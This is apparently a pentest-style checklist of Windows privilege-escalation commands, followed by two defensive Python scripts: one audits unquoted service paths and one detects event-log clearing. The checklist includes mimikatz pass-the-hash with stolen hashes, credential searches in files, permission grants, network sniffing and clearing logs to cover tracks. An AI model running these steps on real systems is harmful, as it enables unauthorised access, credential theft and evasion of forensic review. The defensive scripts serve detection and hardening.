Detailed Steps for Workstation Privilege Escalation

1. Local Reconnaissance: Gather system information to identify potential escalation vectors.
   Command: systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
   Purpose: Provides details about the operating system and system architecture.

2. Service Exploits: Check for vulnerable services.
   Command: sc query | findstr /i "SERVICE_NAME"
   Purpose: Lists all services and their states to identify potential misconfigurations or vulnerable software.

3. Scheduled Tasks: Review scheduled tasks for potential misuse.
   Command: schtasks /query /fo LIST /v
   Purpose: Displays detailed information about scheduled tasks that could be exploited.

4. Unquoted Service Paths: Exploit unquoted service paths to gain elevated privileges.
   Command: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\" | findstr /i /v """
   Purpose: Finds auto-start services with unquoted paths that could be hijacked.

5. Weak Permissions: Exploit weak folder permissions to replace executables or configuration files.
   Command: icacls "C:\Program Files\Some Software" /grant "username:(F)"
   Purpose: Modifies permissions to allow full control over a directory.

6. Vulnerable Applications: Identify and exploit vulnerable installed applications.
   Command: wmic product get name,version
   Purpose: Lists installed software for manual checking against vulnerability databases.

7. Driver Exploits: Check for outdated or vulnerable drivers.
   Command: driverquery
   Purpose: Displays all installed device drivers and their properties.

8. Network Sniffing: Monitor network traffic for credentials or sensitive data.
   Command: tcpdump -i eth0 -w capture.pcap
   Purpose: Captures packets on the network interface for later analysis.

9. Clear Logs: Clear event logs to hide tracks.
   Command: wevtutil cl System
   Purpose: Clears the System log to cover forensic tracks.

10. Pass the Hash: Use stolen hashes for authentication bypass.
    Command: mimikatz "sekurlsa::pth /user:admin /domain:domain.com /ntlm:HASH /run:cmd.exe"
    Purpose: Opens a new command prompt with elevated privileges using the NTLM hash.

11. Exploit Common Vulnerabilities: Search for and exploit known vulnerabilities in installed software.
    Command: searchsploit [software]
    Purpose: Uses Exploit-DB to find exploits for known vulnerabilities.

12. Registry Permissions: Check for misconfigured registry permissions.
    Command: reg query HKLM /f "sethc.exe" /t REG_SZ /s
    Purpose: Checks for potential Sticky Keys override points in the registry.

13. Startup Items: Examine startup items for persistence and privilege escalation opportunities.
    Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    Purpose: Lists programs that run on startup.

14. Path Interception: Identify writable directories in the system PATH for DLL hijacking.
    Command: echo %PATH%, then icacls on each listed directory to check its permissions.

15. Symbolic Link Abuse: Use symbolic links to redirect access to controlled resources.
    Command: mklink /D link target
    Purpose: Creates a symbolic link that redirects operations from the intended target to an attacker-controlled target.

16. Credentials in Files: Search the file system for stored credentials.
    Command: findstr /si password *.txt *.ini *.config
    Purpose: Searches for the string "password" across common text-based config files.

17. Secrets Management: Check for improper secrets management.
    Command: dir /s *secrets*.xml *creds*.txt
    Purpose: Searches for files that might store sensitive information.

18. Outdated Components: Identify and exploit outdated components and libraries.
    Command: sigcheck -u -e C:\path\to\directory
    Purpose: Checks for unsigned and older versions of files in a directory.

19. Logon Scripts: Investigate logon scripts for exploitation opportunities.
    Command: type %LOGONSERVER%\netlogon\logon.bat
    Purpose: Displays the contents of a common logon script.

20. Service Configurations: Examine service configurations for weaknesses.
    Command: sc qc servicename
    Purpose: Queries the configuration of a specified service to identify potential misconfigurations or vulnerabilities.
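The unquoted-service-path check above is one a defender should run in the same way to find and fix services before anyone else does. Below is an added audit script (not from the original list, and not a Microsoft tool) that parses `wmic service get name,displayname,pathname,startmode /format:csv` output, applies the same "unquoted image path containing spaces, outside C:\Windows" rule, and emits the `sc config ... binPath=` remediation that re-quotes the path. The CSV sample is constructed for this example; the column order and the quoting of embedded double quotes are assumptions about wmic's CSV output, which is why the parser reads columns by header name rather than by position.

```python
import csv
import io
import re

# Constructed sample of `wmic service get name,displayname,pathname,startmode /format:csv`
# output (not captured from a real host). wmic emits a leading blank line and a Node column.
# A doubled quote inside a CSV field ("") represents a literal double quote.
SAMPLE_WMIC_CSV = r'''
Node,DisplayName,Name,PathName,StartMode
WS01,Print Spooler,Spooler,C:\Windows\System32\spoolsv.exe,Auto
WS01,Example Updater,UpdaterSvc,C:\Program Files\Example Corp\Updater\svc.exe -start,Auto
WS01,Backup Agent,BackupAgent,"""C:\Program Files\Backup Agent\agent.exe"" /svc",Auto
WS01,Legacy Tool,LegacyTool,C:\Tools\legacy.exe,Manual
WS01,Old Agent,OldAgent,C:\Old Agent\agent.exe,Manual
'''

# For an unquoted path the image is taken to end at the first ".exe" token; the
# arguments (if any) follow the first whitespace after it.
EXE_RE = re.compile(r'^(.*?\.exe)(\s.*)?$', re.IGNORECASE)


def split_image_path(pathname):
    """Return (image_path, arguments) for a service PathName value."""
    p = pathname.strip()
    if p.startswith('"'):
        # Quoted path: the image ends at the closing quote.
        end = p.find('"', 1)
        if end == -1:
            return p.strip('"'), ''
        return p[1:end], p[end + 1:].strip()
    m = EXE_RE.match(p)
    if m:
        return m.group(1), (m.group(2) or '').strip()
    return p, ''


def is_unquoted_with_spaces(pathname):
    """True when the image path is not quoted and contains a space."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    image, _ = split_image_path(p)
    return ' ' in image


def remediation_command(name, pathname):
    """Build the `sc config` command that re-quotes the image path."""
    image, args = split_image_path(pathname)
    binpath = f'"{image}"' + (f' {args}' if args else '')
    # Inside the outer binPath= argument each literal quote must be escaped as \"
    escaped = binpath.replace('"', '\\"')
    return f'sc config {name} binPath= "{escaped}"'


def audit_services(csv_text, skip_windows_dir=True):
    """Return a list of findings for services with unquoted, space-containing paths."""
    reader = csv.DictReader(io.StringIO(csv_text.lstrip()))
    findings = []
    for row in reader:
        path = row.get('PathName') or ''
        if skip_windows_dir and path.strip().strip('"').lower().startswith('c:\\windows\\'):
            continue  # same exclusion as the findstr /v "C:\Windows\" filter
        if is_unquoted_with_spaces(path):
            findings.append({
                'name': row['Name'],
                'start_mode': row.get('StartMode', ''),
                'path': path,
                'fix': remediation_command(row['Name'], path),
            })
    return findings


if __name__ == '__main__':
    for f in audit_services(SAMPLE_WMIC_CSV):
        print(f"{f['name']} ({f['start_mode']}): {f['path']}")
        print(f"  fix: {f['fix']}")
```

Auto-start services are the ones worth fixing first, since they execute as SYSTEM at boot without anyone logging in; the finding keeps the StartMode so the report can be sorted that way. On a live host, pipe the real wmic output into `audit_services` instead of the constructed sample.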
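The "Clear Logs" step (`wevtutil cl System`) is noisy from a defender's point of view: clearing the Security log writes Event ID 1102 ("The audit log was cleared") to the Security log, and clearing System or another log writes Event ID 104 ("The <log> log file was cleared") to the System log, both from the Microsoft-Windows-Eventlog provider, and both record the account that did it. The detection logic below is an added example, not part of the original list; the JSON-lines event records are constructed for the example and only approximate the fields an exported event carries (the simplified field names Channel, Provider, EventID, User and Detail are assumptions, not a real export format).

```python
import json

# Constructed sample events in a simplified JSON-lines form (not real wevtutil or
# Event Viewer export output). Backslashes are JSON-escaped.
SAMPLE_EVENTS = r"""
{"Channel": "System", "Provider": "Service Control Manager", "EventID": 7036, "Computer": "WS01", "User": "", "Detail": "The Print Spooler service entered the running state."}
{"Channel": "System", "Provider": "Microsoft-Windows-Eventlog", "EventID": 104, "Computer": "WS01", "User": "WS01\\localadmin", "Detail": "The System log file was cleared."}
{"Channel": "Security", "Provider": "Microsoft-Windows-Eventlog", "EventID": 1102, "Computer": "WS01", "User": "WS01\\localadmin", "Detail": "The audit log was cleared."}
{"Channel": "Application", "Provider": "MsiInstaller", "EventID": 11707, "Computer": "WS01", "User": "", "Detail": "Installation completed successfully."}
"""

# (channel, event id) pairs written by Windows when a log is cleared.
LOG_CLEAR_SIGNATURES = {
    ("Security", 1102): "Security audit log cleared",
    ("System", 104): "Event log cleared (System or another log)",
}
LOG_CLEAR_PROVIDER = "Microsoft-Windows-Eventlog"


def detect_log_clearing(jsonl_text):
    """Return one alert per log-clearing event found in the JSON-lines input."""
    alerts = []
    for line in jsonl_text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        key = (ev.get("Channel"), ev.get("EventID"))
        # Both the event id and the provider must match: other providers reuse
        # small event ids like 104 for unrelated messages.
        if key in LOG_CLEAR_SIGNATURES and ev.get("Provider") == LOG_CLEAR_PROVIDER:
            alerts.append({
                "computer": ev.get("Computer", ""),
                "channel": key[0],
                "event_id": key[1],
                "user": ev.get("User", ""),
                "summary": LOG_CLEAR_SIGNATURES[key],
            })
    return alerts


def actors(alerts):
    """Distinct accounts that cleared a log, for triage."""
    return sorted({a["user"] for a in alerts if a["user"]})


if __name__ == "__main__":
    for a in detect_log_clearing(SAMPLE_EVENTS):
        print(f"[{a['computer']}] {a['channel']} {a['event_id']}: {a['summary']} by {a['user']}")
```

The clear-event itself survives on the host because it is written after the log is emptied, but everything before it is gone; forwarding events to a collector (Windows Event Forwarding or a SIEM agent) is what preserves the history, and a rule on 1102/104 at the collector is what turns the cover-up step into an alert.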